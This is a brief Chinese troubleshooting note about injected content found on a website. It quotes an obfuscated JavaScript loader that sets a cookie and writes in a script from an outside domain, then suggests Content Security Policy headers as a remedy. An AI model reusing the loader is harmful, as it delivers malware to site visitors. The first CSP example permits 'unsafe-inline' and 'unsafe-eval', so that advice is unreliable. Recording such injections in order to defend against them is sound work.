发现注入内容:
var _0xafac=["\x67\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x73\x65\x74\x4D\x69\x6E\x75\x74\x65\x73","\x63\x6F\x6F\x6B\x69\x65","\x3D","\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x77\x61\x66\x5F\x73\x63","\x35\x38\x38\x39\x36\x34\x37\x37\x32\x36","\x25\x33\x43\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x73\x3A\x2F\x2F\x70\x6C\x75\x67\x69\x6E\x73\x2E\x64\x6F\x75\x62\x6C\x65\x63\x6C\x69\x63\x6B\x73\x2E\x62\x69\x7A\x2F\x70\x6C\x75\x67\x69\x6E\x73\x2F\x75\x61\x2F\x6C\x69\x6E\x6B\x69\x64\x2E\x6A\x73\x27\x25\x33\x45\x25\x33\x43\x2F\x73\x63\x72\x69\x70\x74\x25\x33\x45","\x77\x72\x69\x74\x65"];function setc(_0xc588x2,_0xc588x3,_0xc588x4){var _0xc588x5= new Date();_0xc588x5[_0xafac[1]](_0xc588x5[_0xafac[0]]()+ _0xc588x4);document[_0xafac[2]]= _0xc588x2+ _0xafac[3]+ _0xc588x3+ _0xafac[4]+ _0xc588x5[_0xafac[5]]()}setc(_0xafac[6],_0xafac[7],360);document[_0xafac[9]](unescape(_0xafac[8]));
使用内容安全策略(CSP): CSP 是一种通过指定允许加载资源的源来减轻和报告特定类型攻击的浏览器安全策略。你可以配置 CSP 来阻止特定域或路径加载脚本。例如,可以添加以下策略到网站的 HTTP 头部:
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval' https://example.com;
在这个例子中,https://example.com
应该替换为你想要允许加载脚本的域名。这样做将阻止任何其他域的脚本加载。
在PHP中
header("Content-Security-Policy: script-src 'self' https://example.com;");
参考 chatgpt